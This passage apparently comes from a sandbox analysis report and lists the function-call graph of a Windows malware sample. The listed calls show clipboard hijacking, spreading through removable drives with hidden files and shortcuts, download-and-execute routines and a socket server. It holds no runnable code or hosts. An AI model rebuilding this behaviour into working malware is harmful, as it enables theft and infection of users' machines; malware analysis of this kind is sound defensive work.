CloseHandle 5016->5017 5017->5014 5018 409340 5019 409343 WaitForSingleObject 5018->5019 5020 409371 5019->5020 5021 40935b InterlockedDecrement 5019->5021 5022 40936a 5021->5022 5022->5019 5023 409470 16 API calls 5022->5023 5023->5022 5024 40b5c0 5029 40b5c4 5024->5029 5026 40b5e0 WaitForSingleObject 5028 40b605 5026->5028 5026->5029 5029->5026 5029->5028 5030 4099a0 EnterCriticalSection 5029->5030 5035 40b420 InterlockedExchangeAdd 5029->5035 5031 4099d7 LeaveCriticalSection 5030->5031 5032 4099bf 5030->5032 5031->5029 5033 40a5d0 3 API calls 5032->5033 5034 4099ca 5033->5034 5034->5031 5036 40b43d 5035->5036 5047 40b436 5035->5047 5052 40b330 5036->5052 5039 40b45d InterlockedIncrement 5041 40b467 5039->5041 5042 40b490 5041->5042 5045 40b560 InterlockedDecrement 5041->5045 5048 408840 _invalid_parameter 7 API calls 5041->5048 5049 40b260 6 API calls 5041->5049 5051 408990 _invalid_parameter 3 API calls 5041->5051 5059 409dd0 5041->5059 5063 409f30 5041->5063 5062 409200 inet_ntoa 5042->5062 5044 40b49c 5044->5045 5077 409320 shutdown closesocket 5045->5077 5047->5029 5048->5041 5049->5041 5051->5041 5053 40b33d socket 5052->5053 5054 40b352 htons connect 5053->5054 5055 40b3af 5053->5055 5054->5055 5057 40b39a 5054->5057 5055->5053 5056 40b3a3 5055->5056 5056->5039 5056->5047 5078 409320 shutdown closesocket 5057->5078 5079 409be0 5059->5079 5062->5044 5074 409f41 5063->5074 5066 408990 _invalid_parameter 3 API calls 5067 40a2c4 5066->5067 5067->5041 5068 409f5f 5068->5066 5069 409c80 20 API calls 5069->5074 5072 409dd0 13 API calls 5072->5074 5073 409980 28 API calls 5073->5074 5074->5068 5074->5069 5074->5072 5074->5073 5087 409e50 5074->5087 5094 4099f0 EnterCriticalSection 5074->5094 5099 405550 5074->5099 5104 405590 5074->5104 5109 405460 5074->5109 5116 4054c0 5074->5116 5077->5047 5078->5056 5080 40a610 3 API calls 5079->5080 5081 409beb 5080->5081 5082 409c07 lstrlenA 5081->5082 5083 40a8a0 7 API calls 5082->5083 5084 409c3d 5083->5084 5085 409c68 5084->5085 5086 408990 _invalid_parameter 3 API calls 5084->5086 5085->5041 5086->5085 5088 409e61 lstrlenA 5087->5088 5089 40a8a0 7 API calls 5088->5089 5093 409e7f 5089->5093 5090 409e8b 5091 409f0f 5090->5091 5092 408990 _invalid_parameter 3 API calls 5090->5092 5091->5074 5092->5091 5093->5088 5093->5090 5095 409a08 5094->5095 5096 409a44 LeaveCriticalSection 5095->5096 5119 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5095->5119 5096->5074 5098 409a33 5098->5096 5120 4054f0 5099->5120 5102 405589 5102->5074 5103 40b8c0 17 API calls 5103->5102 5105 4054f0 65 API calls 5104->5105 5106 4055af 5105->5106 5107 4055dc 5106->5107 5130 405410 5106->5130 5107->5074 5133 4045e0 EnterCriticalSection 5109->5133 5111 40547a 5115 4054ad 5111->5115 5138 405370 5111->5138 5114 408990 _invalid_parameter 3 API calls 5114->5115 5115->5074 5145 4046a0 EnterCriticalSection 5116->5145 5118 4054e2 5118->5074 5119->5098 5123 405503 5120->5123 5121 405540 5121->5102 5121->5103 5123->5121 5124 4044f0 EnterCriticalSection 5123->5124 5125 40af30 63 API calls 5124->5125 5129 404510 5125->5129 5126 4045be LeaveCriticalSection 5126->5123 5127 408990 _invalid_parameter 3 API calls 5128 4045bb 5127->5128 5128->5126 5129->5126 5129->5127 5131 409be0 13 API calls 5130->5131 5132 405455 5131->5132 5132->5107 5134 4045fe 5133->5134 5135 40468a LeaveCriticalSection 5134->5135 5136 408a00 8 API calls 5134->5136 5135->5111 5137 40465c 5136->5137 5137->5135 5139 408840 _invalid_parameter 7 API calls 5138->5139 5140 405382 memcpy 5139->5140 5141 409be0 13 API calls 5140->5141 5142 4053ec 5141->5142 5143 408990 _invalid_parameter 3 API calls 5142->5143 5144 4053fb 5143->5144 5144->5114 5169 40af90 5145->5169 5148 4048de LeaveCriticalSection 5148->5118 5149 40af30 63 API calls 5150 4046db 5149->5150 5150->5148 5153 408990 _invalid_parameter 3 API calls 5150->5153 5168 4047f3 5150->5168 5151 404210 15 API calls 5156 40481c 5151->5156 5152 408990 _invalid_parameter 3 API calls 5154 40483d 5152->5154 5155 404752 5153->5155 5154->5148 5157 40484c CreateFileW 5154->5157 5158 408a00 8 API calls 5155->5158 5156->5152 5157->5148 5159 40486f 5157->5159 5160 404762 5158->5160 5163 4048ca FlushFileBuffers CloseHandle 5159->5163 5164 40488c WriteFile 5159->5164 5161 408990 _invalid_parameter 3 API calls 5160->5161 5162 404789 5161->5162 5165 40a8a0 7 API calls 5162->5165 5163->5148 5164->5159 5166 4047c0 5165->5166 5167 4059c0 10 API calls 5166->5167 5167->5168 5168->5151 5168->5156 5172 40a4e0 5169->5172 5177 40a4f3 5172->5177 5173 408a00 8 API calls 5173->5177 5174 40a50d 5176 408990 _invalid_parameter 3 API calls 5174->5176 5175 40a440 62 API calls 5175->5177 5178 4046c4 5176->5178 5177->5173 5177->5174 5177->5175 5179 406300 61 API calls 5177->5179 5178->5148 5178->5149 5179->5177 5180 40b7c0 5186 40e9b0 5180->5186 5183 40b800 5184 40b7e7 WaitForSingleObject 5190 40de00 5184->5190 5187 40b7d6 5186->5187 5188 40e9b7 5186->5188 5187->5183 5187->5184 5188->5187 5211 40e820 5188->5211 5191 40df32 5190->5191 5192 40de08 5190->5192 5191->5183 5192->5191 5193 40de14 EnterCriticalSection 5192->5193 5194 40deb0 LeaveCriticalSection SetEvent 5193->5194 5197 40de2b 5193->5197 5195 40dee3 5194->5195 5196 40decb 5194->5196 5238 40b9b0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 5195->5238 5199 40ded1 PostQueuedCompletionStatus 5196->5199 5197->5194 5198 40de3c InterlockedDecrement 5197->5198 5201 40de55 InterlockedExchangeAdd 5197->5201 5209 40de9b InterlockedDecrement 5197->5209 5198->5197 5199->5195 5199->5199 5201->5197 5204 40de68 InterlockedIncrement 5201->5204 5202 40deee 5247 40baf0 5202->5247 5232 40e450 WSARecv 5204->5232 5208 40df1f DeleteCriticalSection 5210 408990 _invalid_parameter 3 API calls 5208->5210 5209->5197 5210->5191 5212 408820 7 API calls 5211->5212 5213 40e82b 5212->5213 5214 40e9a4 5213->5214 5215 40e838 GetSystemInfo InitializeCriticalSection CreateEventA 5213->5215 5214->5187 5216 40e876 CreateIoCompletionPort 5215->5216 5217 40e99f 5215->5217 5216->5217 5218 40e88f 5216->5218 5219 40de00 36 API calls 5217->5219 5220 40b810 8 API calls 5218->5220 5219->5214 5221 40e894 5220->5221 5221->5217 5222 40e89f WSASocketA 5221->5222 5222->5217 5223 40e8bd setsockopt htons bind 5222->5223 5223->5217 5224 40e926 listen 5223->5224 5224->5217 5225 40e93a WSACreateEvent 5224->5225 5225->5217 5226 40e947 WSAEventSelect 5225->5226 5226->5217 5231 40e959 5226->5231 5227 40e97f 5229 40b8c0 17 API calls 5227->5229 5228 40b8c0 17 API calls 5228->5231 5230 40e994 5229->5230 5230->5187 5231->5227 5231->5228 5233 40e4d2 5232->5233 5234 40e48e 5232->5234 5233->5197 5235 40e490 WSAGetLastError 5234->5235 5236 40e4a4 Sleep WSARecv 5234->5236 5237 40e4db 5234->5237 5235->5233 5235->5234 5236->5233 5236->5235 5237->5197 5239 40b9e6 InterlockedExchangeAdd 5238->5239 5240 40bac9 GetCurrentThread SetThreadPriority 5238->5240 5239->5240 5245 40ba00 5239->5245 5240->5202 5241 40ba19 EnterCriticalSection 5241->5245 5242 40ba87 LeaveCriticalSection 5242->5245 5246 40ba9e 5242->5246 5243 40ba63 WaitForSingleObject 5243->5245 5244 40babc Sleep 5244->5245 5245->5240 5245->5241 5245->5242 5245->5243 5245->5244 5245->5246 5246->5240 5248 40bb72 CloseHandle CloseHandle WSACloseEvent 5247->5248 5249 40bafc EnterCriticalSection 5247->5249 5256 409320 shutdown closesocket 5248->5256 5250 40bb18 5249->5250 5251 40bb40 LeaveCriticalSection DeleteCriticalSection 5250->5251 5252 40bb2b CloseHandle 5250->5252 5253 408990 _invalid_parameter 3 API calls 5251->5253 5252->5250 5254 40bb66 5253->5254 5255 408990 _invalid_parameter 3 API calls 5254->5255 5255->5248 5256->5208 5650 40b200 5655 40b1a0 5650->5655 5653 40b22e 5654 40b1a0 send 5654->5653 5656 40b1b1 send 5655->5656 5657 40b1e5 5656->5657 5658 40b1ce 5656->5658 5657->5653 5657->5654 5658->5656 5658->5657 5659 40b580 5660 409610 4 API calls 5659->5660 5661 40b593 5660->5661 5662 40b5aa 5661->5662 5663 40b420 132 API calls 5661->5663 5663->5662 5269 405045 5272 404feb 5269->5272 5270 40501b lstrcmpiW 5270->5272 5271 405196 FindNextFileW 5274 4051b2 FindClose 5271->5274 5275 404fbf lstrcmpW 5271->5275 5272->5270 5272->5271 5273 405082 PathMatchSpecW 5272->5273 5277 405100 PathFileExistsW 5272->5277 5283 404bb0 CreateDirectoryW wsprintfW FindFirstFileW 5272->5283 5273->5272 5276 4050a3 wsprintfW SetFileAttributesW DeleteFileW 5273->5276 5279 4051bf 5274->5279 5275->5272 5278 404fd5 lstrcmpW 5275->5278 5276->5272 5277->5272 5280 405116 wsprintfW wsprintfW 5277->5280 5278->5272 5280->5272 5281 405180 MoveFileExW 5280->5281 5281->5271 5284 404c05 lstrcmpW 5283->5284 5285 404cdf 5283->5285 5286 404c1b lstrcmpW 5284->5286 5290 404c31 5284->5290 5285->5272 5287 404c33 wsprintfW wsprintfW 5286->5287 5286->5290 5289 404c96 MoveFileExW 5287->5289 5287->5290 5288 404cac FindNextFileW 5288->5284 5291 404cc8 FindClose RemoveDirectoryW 5288->5291 5289->5288 5290->5288 5291->5285 5664 404685 5665 4045fe 5664->5665 5666 40468a LeaveCriticalSection 5665->5666 5667 408a00 8 API calls 5665->5667 5668 40465c 5667->5668 5668->5666 5669 40ea08 5670 40ea10 5669->5670 5672 40eac4 5670->5672 5675 40ec4d 5670->5675 5674 40ea49 5674->5672 5679 40eb38 RtlUnwind 5674->5679 5676 40ec62 5675->5676 5678 40ec7e 5675->5678 5677 40eced NtQueryVirtualMemory 5676->5677 5676->5678 5677->5678 5678->5674 5680 40eb50 5679->5680 5680->5674 5292 403ed0 GetWindowLongW 5293 403ef4 5292->5293 5294 403f16 5292->5294 5295 403f01 5293->5295 5296 403f87 IsClipboardFormatAvailable 5293->5296 5297 403f11 5294->5297 5298 403f66 5294->5298 5299 403f4e SetWindowLongW 5294->5299 5302 403f24 SetClipboardViewer SetWindowLongW 5295->5302 5303 403f07 5295->5303 5300 403fa3 IsClipboardFormatAvailable 5296->5300 5301 403f9a 5296->5301 5304 404104 DefWindowProcA 5297->5304 5298->5297 5305 403f6c SendMessageA 5298->5305 5299->5297 5300->5301 5306 403fb8 IsClipboardFormatAvailable 5300->5306 5308 403fd5 OpenClipboard 5301->5308 5309 40409c 5301->5309 5302->5304 5303->5297 5307 4040bd RegisterRawInputDevices ChangeClipboardChain 5303->5307 5305->5297 5306->5301 5307->5304 5308->5309 5311 403fe5 GetClipboardData 5308->5311 5309->5297 5310 4040a5 SendMessageA 5309->5310 5310->5297 5311->5297 5312 403ffd GlobalLock 5311->5312 5312->5297 5313 404015 5312->5313 5314 404028 5313->5314 5315 404049 5313->5315 5316 40405e 5314->5316 5317 40402e 5314->5317 5318 403ce0 13 API calls 5315->5318 5333 403e00 5316->5333 5319 404034 GlobalUnlock CloseClipboard 5317->5319 5327 403c20 5317->5327 5318->5319 5319->5309 5323 404087 5319->5323 5341 403480 lstrlenW 5323->5341 5326 408990 _invalid_parameter 3 API calls 5326->5309 5328 403c2b 5327->5328 5329 403c31 lstrlenW 5328->5329 5330 403c44 5328->5330 5331 408840 _invalid_parameter 7 API calls 5328->5331 5332 403c61 lstrcpynW 5328->5332 5329->5328 5329->5330 5330->5319 5331->5328 5332->5328 5332->5330 5337 403e0d 5333->5337 5334 403e13 lstrlenA 5335 403e26 5334->5335 5334->5337 5335->5319 5336 403bc0 2 API calls 5336->5337 5337->5334 5337->5335 5337->5336 5338 408840 _invalid_parameter 7 API calls 5337->5338 5340 408990 _invalid_parameter 3 API calls 5337->5340 5370 403db0 5337->5370 5338->5337 5340->5337 5342 4034b0 5341->5342 5343 403698 StrStrW 5342->5343 5344 40363a 5342->5344 5366 403628 5342->5366 5343->5344 5345 4036c3 StrStrW 5343->5345 5346 403756 StrStrW 5344->5346 5344->5366 5345->5344 5347 4036eb StrStrW 5345->5347 5348 40376d 5346->5348 5351 403800 StrStrW 5346->5351 5347->5344 5349 4037c6 isalpha 5348->5349 5348->5351 5348->5366 5349->5348 5350 4037dd isdigit 5349->5350 5350->5348 5350->5366 5353 4039e7 5351->5353 5354 4039ee StrStrW 5351->5354 5353->5354 5355 403a01 StrStrW 5354->5355 5357 403a3f 5355->5357 5358 403aa2 StrStrW 5357->5358 5361 403ae9 lstrlenA 5357->5361 5359 403ab5 5358->5359 5360 403abc StrStrW 5358->5360 5359->5360 5362 403ad6 StrStrW 5360->5362 5363 403acf 5360->5363 5365 403b39 GlobalAlloc 5361->5365 5361->5366 5362->5361 5363->5362 5365->5366 5367 403b54 GlobalLock 5365->5367 5366->5326 5367->5366 5368 403b67 memcpy GlobalUnlock OpenClipboard 5367->5368 5368->5366 5369 403b94 EmptyClipboard SetClipboardData CloseClipboard 5368->5369 5369->5366 5371 403dbb 5370->5371 5372 403dc1 lstrlenA 5371->5372 5373 403bc0 2 API calls 5371->5373 5374 403df4 5371->5374 5372->5371 5373->5371 5374->5337 5375 40bcd0 5381 40d5c0 5375->5381 5377 40bce7 5378 40bd11 5377->5378 5379 40bcf8 WaitForSingleObject 5377->5379 5394 40da20 5379->5394 5382 40d5ce 5381->5382 5388 40d6ae 5381->5388 5383 408820 7 API calls 5382->5383 5382->5388 5384 40d5de CreateEventA socket 5383->5384 5385 40d615 5384->5385 5389 40d61a 5384->5389 5386 40da20 8 API calls 5385->5386 5386->5389 5387 40d624 htons setsockopt bind 5390 40d694 CreateThread 5387->5390 5391 40d688 5387->5391 5388->5377 5389->5387 5389->5388 5390->5388 5392 40da20 8 API calls 5391->5392 5393 40d68d 5392->5393 5393->5377 5395 40da24 5394->5395 5403 40da80 5394->5403 5396 40da2c SetEvent WaitForSingleObject CloseHandle 5395->5396 5395->5403 5397 40da70 5396->5397 5402 40da54 5396->5402 5404 409320 shutdown closesocket 5397->5404 5399 40da7a 5401 408990 _invalid_parameter 3 API calls 5399->5401 5400 408990 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5400->5402 5401->5403 5402->5397 5402->5400 5403->5378 5404->5399 5405 40e750 GetQueuedCompletionStatus 5406 40e792 5405->5406 5407 40e808 5405->5407 5408 40e797 WSAGetOverlappedResult 5406->5408 5412 40e560 5406->5412 5408->5406 5409 40e7b9 WSAGetLastError 5408->5409 5409->5406 5411 40e7d3 GetQueuedCompletionStatus 5411->5406 5411->5407 5413 40e6f2 InterlockedDecrement setsockopt closesocket 5412->5413 5414 40e574 5412->5414 5431 40e639 5413->5431 5414->5413 5415 40e57c 5414->5415 5432 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5415->5432 5417 40e581 InterlockedExchange 5418 40e598 5417->5418 5419 40e64e 5417->5419 5424 40e5a9 InterlockedDecrement 5418->5424 5425 40e5bc InterlockedDecrement InterlockedExchangeAdd 5418->5425 5418->5431 5420 40e667 5419->5420 5421 40e657 InterlockedDecrement 5419->5421 5422 40e672 5420->5422 5423 40e687 InterlockedDecrement 5420->5423 5421->5411 5441 40e2e0 WSASend 5422->5441 5427 40e6e9 5423->5427 5424->5411 5428 40e62f 5425->5428 5427->5411 5433 40e4f0 5428->5433 5429 40e67e 5429->5411 5431->5411 5432->5417 5434 40e500 InterlockedExchangeAdd 5433->5434 5435 40e4fc 5433->5435 5436 40e553 5434->5436 5437 40e517 InterlockedIncrement 5434->5437 5435->5431 5436->5431 5438 40e450 4 API calls 5437->5438 5439 40e546 5438->5439 5439->5436 5440 40e54c InterlockedDecrement 5439->5440 5440->5436 5442 40e350 5441->5442 5443 40e312 WSAGetLastError 5441->5443 5442->5429 5443->5442 5444 40e31f 5443->5444 5445 40e356 5444->5445 5446 40e326 Sleep WSASend 5444->5446 5445->5429 5446->5442 5446->5443 5447 4051d0 Sleep GetModuleFileNameW 5461 40cea0 CreateFileW 5447->5461 5449 405358 ExitThread 5451 405200 5451->5449 5452 405348 Sleep 5451->5452 5453 405239 5451->5453 5464 4049e0 GetLogicalDrives 5451->5464 5452->5451 5470 404980 5453->5470 5456 405270 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5457 4052e6 wsprintfW 5456->5457 5458 4052fb wsprintfW 5456->5458 5457->5458 5476 404cf0 _chkstk 5458->5476 5460 40526b 5462 40cee8 5461->5462 5463 40cecf GetFileSize CloseHandle 5461->5463 5462->5451 5463->5462 5469 404a0d 5464->5469 5465 404a86 5465->5451 5466 404a1c RegOpenKeyExW 5467 404a3e RegQueryValueExW 5466->5467 5466->5469 5468 404a7a RegCloseKey 5467->5468 5467->5469 5468->5469 5469->5465 5469->5466 5469->5468 5471 4049d9 5470->5471 5472 40499c 5470->5472 5471->5456 5471->5460 5511 404900 GetDriveTypeW 5472->5511 5475 4049cb lstrcpyW 5475->5471 5477 404d07 5476->5477 5478 404d0e 6 API calls 5476->5478 5477->5460 5479 404dc2 5478->5479 5480 404e04 PathFileExistsW 5478->5480 5481 40cea0 3 API calls 5479->5481 5482 404e80 PathFileExistsW 5480->5482 5483 404e15 PathFileExistsW 5480->5483 5486 404dce 5481->5486 5484 404e91 5482->5484 5485 404ed6 FindFirstFileW 5482->5485 5487 404e26 CreateDirectoryW 5483->5487 5488 404e48 PathFileExistsW 5483->5488 5489 404eb1 5484->5489 5490 404e99 5484->5490 5485->5477 5492 404efd 5485->5492 5486->5480 5491 404de5 SetFileAttributesW DeleteFileW 5486->5491 5487->5488 5493 404e39 SetFileAttributesW 5487->5493 5488->5482 5494 404e59 CopyFileW 5488->5494 5497 404aa0 3 API calls 5489->5497 5516 404aa0 CoInitialize CoCreateInstance 5490->5516 5491->5480 5498 404fbf lstrcmpW 5492->5498 5502 405196 FindNextFileW 5492->5502 5504 40501b lstrcmpiW 5492->5504 5505 405082 PathMatchSpecW 5492->5505 5507 405100 PathFileExistsW 5492->5507 5510 404bb0 11 API calls 5492->5510 5493->5488 5494->5482 5495 404e71 SetFileAttributesW 5494->5495 5495->5482 5499 404eac SetFileAttributesW 5497->5499 5498->5492 5500 404fd5 lstrcmpW 5498->5500 5499->5485 5500->5492 5502->5498 5503 4051b2 FindClose 5502->5503 5503->5477 5504->5492 5505->5492 5506 4050a3 wsprintfW SetFileAttributesW DeleteFileW 5505->5506 5506->5492 5507->5492 5508 405116 wsprintfW wsprintfW 5507->5508 5508->5492 5509 405180 MoveFileExW 5508->5509 5509->5502 5510->5492 5512 40493a 5511->5512 5513 404928 5511->5513 5512->5471 5512->5475 5513->5512 5514 40493c QueryDosDeviceW 5513->5514 5514->5512 5515 404956 StrCmpNW 5514->5515 5515->5512 5517 404ad6 5516->5517 5519 404b12 5516->5519 5518 404ae0 wsprintfW 5517->5518 5517->5519 5518->5519 5519->5499 5681 40b610 5686 40e360 5681->5686 5683 40b625 5684 40e360 16 API calls 5683->5684 5685 40b643 5683->5685 5684->5685 5687 40e43b 5686->5687 5688 40e370 5686->5688 5687->5683 5688->5687 5689 408820 7 API calls 5688->5689 5690 40e398 5689->5690 5690->5687 5691 408a00 8 API calls 5690->5691 5692 40e3c4 5691->5692 5693 40e3e0 5692->5693 5694 40e3d1 5692->5694 5696 40e2e0 4 API calls 5693->5696 5695 408990 _invalid_parameter 3 API calls 5694->5695 5697 40e3d7 5695->5697 5698 40e3ed 5696->5698 5697->5683 5699 40e3f6 EnterCriticalSection 5698->5699 5700 40e42c 5698->5700 5701 40e419 LeaveCriticalSection 5699->5701 5702 40e40d 5699->5702 5703 408990 _invalid_parameter 3 API calls 5700->5703 5701->5683 5702->5701 5704 40e435 5703->5704 5705 408990 _invalid_parameter 3 API calls 5704->5705 5705->5687 5706 40ea10 5707 40ea2e 5706->5707 5709 40eac4 5706->5709 5708 40ec4d NtQueryVirtualMemory 5707->5708 5710 40ea49 5708->5710 5710->5709 5711 40eb38 RtlUnwind 5710->5711 5711->5710 5712 40dc10 5713 40dca0 5712->5713 5714 40dc27 5712->5714 5715 40dc37 5714->5715 5716 40dc55 EnterCriticalSection 5714->5716 5717 40dc8c LeaveCriticalSection DeleteCriticalSection 5716->5717 5720 40dc6d 5716->5720 5718 408990 _invalid_parameter 3 API calls 5717->5718 5718->5713 5719 408990 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5719->5720 5720->5719 5721 40dc8b 5720->5721 5721->5717 5520 406359 5521 406362 5520->5521 5522 406371 34 API calls 5521->5522 5523 4071a6 5521->5523 5722 40d79f 5723 40d760 5722->5723 5724 40d7cb memmove 5723->5724 5725 40d7de 5723->5725 5724->5723 5524 40bbe0 5525 409f30 118 API calls 5524->5525 5526 40bc18 5525->5526 5726 405a20 5727 405a7f Sleep 5726->5727 5728 405a96 5727->5728 5729 405b16 Sleep 5728->5729 5730 405aae Sleep wsprintfA 5728->5730 5740 40d210 GetTickCount srand ExpandEnvironmentStringsW 5728->5740 5729->5727 5733 40d160 InternetOpenA 5730->5733 5734 40d186 InternetOpenUrlA 5733->5734 5735 40d1f8 Sleep 5733->5735 5736 40d1a5 HttpQueryInfoA 5734->5736 5737 40d1ee InternetCloseHandle 5734->5737 5735->5728 5738 40d1e4 InternetCloseHandle 5736->5738 5739 40d1ce 5736->5739 5737->5735 5738->5737 5739->5738 5741 40d25e 5740->5741 5741->5741 5742 40d27c mbstowcs rand rand wsprintfW InternetOpenW 5741->5742 5743 40d480 InternetCloseHandle Sleep 5742->5743 5744 40d315 InternetOpenUrlW 5742->5744 5747 40d4a7 6 API calls 5743->5747 5766 40d5a5 5743->5766 5745 40d473 InternetCloseHandle 5744->5745 5746 40d344 CreateFileW 5744->5746 5745->5743 5748 40d373 InternetReadFile 5746->5748 5749 40d466 CloseHandle 5746->5749 5750 40d529 wsprintfW DeleteFileW Sleep 5747->5750 5747->5766 5751 40d3c6 CloseHandle wsprintfW DeleteFileW Sleep 5748->5751 5752 40d397 5748->5752 5749->5745 5753 40cef0 20 API calls 5750->5753 5770 40cef0 CreateFileW 5751->5770 5752->5751 5756 40d3a0 WriteFile 5752->5756 5755 40d569 5753->5755 5758 40d573 Sleep 5755->5758 5759 40d5a7 DeleteFileW 5755->5759 5756->5748 5762 40d0b0 5 API calls 5758->5762 5759->5766 5760 40d459 DeleteFileW 5760->5749 5761 40d41d Sleep 5763 40d0b0 5 API calls 5761->5763 5764 40d58a 5762->5764 5765 40d434 5763->5765 5764->5766 5768 40d59d ExitProcess 5764->5768 5767 40d450 5765->5767 5769 40d448 ExitProcess 5765->5769 5766->5728 5767->5749 5771 40d043 5770->5771 5772 40cf37 CreateFileMappingW 5770->5772 5775 40d049 CreateFileW 5771->5775 5776 40d09a 5771->5776 5773 40cf58 MapViewOfFile 5772->5773 5774 40d039 CloseHandle 5772->5774 5777 40cf77 GetFileSize 5773->5777 5778 40d02f CloseHandle 5773->5778 5774->5771 5779 40d091 5775->5779 5780 40d06b WriteFile CloseHandle 5775->5780 5776->5760 5776->5761 5782 40cf93 5777->5782 5783 40d025 UnmapViewOfFile 5777->5783 5778->5774 5781 408990 _invalid_parameter 3 API calls 5779->5781 5780->5779 5781->5776 5790 40af00 5782->5790 5783->5778 5786 40a8a0 7 API calls 5787 40cfde 5786->5787 5787->5783 5788 408990 _invalid_parameter 3 API calls 5787->5788 5789 40d01b 5788->5789 5789->5783 5791 40a990 10 API calls 5790->5791 5792 40af24 5791->5792 5792->5783 5792->5786 5793 405920 5794 405987 5793->5794 5800 405931 5793->5800 5795 405985 5794->5795 5796 40d210 60 API calls 5794->5796 5797 408990 _invalid_parameter 3 API calls 5795->5797 5796->5795 5799 4059b2 5797->5799 5798 405940 StrChrA 5798->5800 5800->5795 5800->5798 5801 40d210 60 API calls 5800->5801 5802 40596f Sleep 5801->5802 5802->5800 5803 404120 5804 404129 memset GetModuleHandleW 5803->5804 5805 404162 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5804->5805 5805->5805 5806 4041a0 CreateWindowExW 5805->5806 5807 4041cb 5806->5807 5808 4041cd GetMessageA 5806->5808 5809 4041ff ExitThread 5807->5809 5810 4041e1 TranslateMessage DispatchMessageA 5808->5810 5811 4041f7 5808->5811 5810->5808 5811->5804 5811->5809 5812 40e120 GetTickCount WaitForSingleObject 5813 40e2c9 5812->5813 5814 40e14d WSAWaitForMultipleEvents 5812->5814 5815 40e1f0 GetTickCount 5814->5815 5816 40e16a WSAEnumNetworkEvents 5814->5816 5817 40e243 GetTickCount 5815->5817 5818 40e205 EnterCriticalSection 5815->5818 5816->5815 5828 40e183 5816->5828 5821 40e2b5 WaitForSingleObject 5817->5821 5822 40e24e EnterCriticalSection 5817->5822 5819 40e216 5818->5819 5820 40e23a LeaveCriticalSection 5818->5820 5826 40e229 LeaveCriticalSection 5819->5826 5854 40e020 5819->5854 5820->5821 5821->5813 5821->5814 5824 40e2a1 LeaveCriticalSection GetTickCount 5822->5824 5825 40e25f InterlockedExchangeAdd 5822->5825 5823 40e192 accept 5823->5815 5823->5828 5824->5821 5864 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5825->5864 5826->5821 5828->5815 5828->5823 5833 40e4f0 7 API calls 5828->5833 5834 40dcb0 5828->5834 5831 40e272 5831->5824 5831->5825 5865 409320 shutdown closesocket 5831->5865 5833->5815 5835 40dcc2 EnterCriticalSection 5834->5835 5836 40dcbd 5834->5836 5837 40dcd7 5835->5837 5838 40dced LeaveCriticalSection 5835->5838 5836->5828 5837->5838 5839 40dcf8 5838->5839 5840 40dcff 5838->5840 5839->5828 5841 408820 7 API calls 5840->5841 5842 40dd09 5841->5842 5843 40dd16 getpeername CreateIoCompletionPort 5842->5843 5844 40dda8 5842->5844 5846 40dda2 5843->5846 5847 40dd56 5843->5847 5868 409320 shutdown closesocket 5844->5868 5850 408990 _invalid_parameter 3 API calls 5846->5850 5866 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5847->5866 5848 40ddb3 5848->5828 5850->5844 5851 40dd5b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5867 40dbd0 EnterCriticalSection LeaveCriticalSection 5851->5867 5853 40dd9b 5853->5828 5855 40e030 5854->5855 5861 40e101 5854->5861 5856 40e03d InterlockedExchangeAdd 5855->5856 5855->5861 5859 40e054 5856->5859 5856->5861 5857 40e080 5858 40e091 5857->5858 5878 409320 shutdown closesocket 5857->5878 5858->5861 5862 40e0a7 InterlockedDecrement 5858->5862 5859->5857 5859->5861 5869 40dfa0 EnterCriticalSection 5859->5869 5861->5820 5862->5861 5864->5831 5865->5831 5866->5851 5867->5853 5868->5848 5870 40e007 LeaveCriticalSection 5869->5870 5871 40dfba InterlockedExchangeAdd 5869->5871 5870->5859 5872 40dfd9 5871->5872 5873 40dfca LeaveCriticalSection 5871->5873 5874 408990 _invalid_parameter 3 API calls 5872->5874 5873->5859 5875 40dffe 5874->5875 5876 408990 _invalid_parameter 3 API calls 5875->5876 5877 40e004 5876->5877 5877->5870 5878->5858 5527 40c461 5529 40c46a 5527->5529 5528 40c55d 5529->5528 5530 40c4d3 lstrcmpiW 5529->5530 5531 40c553 SysFreeString 5530->5531 5532 40c4e6 5530->5532 5531->5528 5533 40bf20 2 API calls 5532->5533 5535 40c4f4 5533->5535 5534 40c545 5534->5531 5535->5531 5535->5534 5536 40c523 lstrcmpiW 5535->5536 5537 40c535 5536->5537 5538 40c53b SysFreeString 5536->5538 5537->5538 5538->5534 5879 405226 5883 405208 5879->5883 5880 405348 Sleep 5880->5883 5881 405239 5882 404980 4 API calls 5881->5882 5884 40524a 5882->5884 5883->5880 5883->5881 5885 405358 ExitThread 5883->5885 5887 4049e0 4 API calls 5883->5887 5886 405270 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5884->5886 5890 40526b 5884->5890 5888 4052e6 wsprintfW 5886->5888 5889 4052fb wsprintfW 5886->5889 5887->5883 5888->5889 5891 404cf0 49 API calls 5889->5891 5891->5890 5892 405b26 ExitThread 5539 4050eb 5551 404feb 5539->5551 5540 405082 PathMatchSpecW 5541 4050a3 wsprintfW SetFileAttributesW DeleteFileW 5540->5541 5540->5551 5541->5551 5542 405100 PathFileExistsW 5544 405116 wsprintfW wsprintfW 5542->5544 5542->5551 5543 405196 FindNextFileW 5546 4051b2 FindClose 5543->5546 5547 404fbf lstrcmpW 5543->5547 5545 405180 MoveFileExW 5544->5545 5544->5551 5545->5543 5549 4051bf 5546->5549 5550 404fd5 lstrcmpW 5547->5550 5547->5551 5548 404bb0 11 API calls 5548->5551 5550->5551 5551->5540 5551->5542 5551->5543 5551->5548 5552 40501b lstrcmpiW 5551->5552 5552->5551 5553 408a6e 5554 408990 _invalid_parameter 3 API calls 5553->5554 5557 408a2d 5554->5557 5555 408a42 5556 408840 _invalid_parameter 7 API calls 5556->5557 5557->5555 5557->5556 5558 408a44 memcpy 5557->5558 5558->5557 5559 40b670 5560 40b687 5559->5560 5577 40b6de 5559->5577 5561 40b691 5560->5561 5562 40b6e3 5560->5562 5563 40b72d 5560->5563 5560->5577 5564 408820 7 API calls 5561->5564 5566 40b708 5562->5566 5567 40b6fb InterlockedDecrement 5562->5567 5592 40a2d0 5563->5592 5568 40b69e 5564->5568 5569 408990 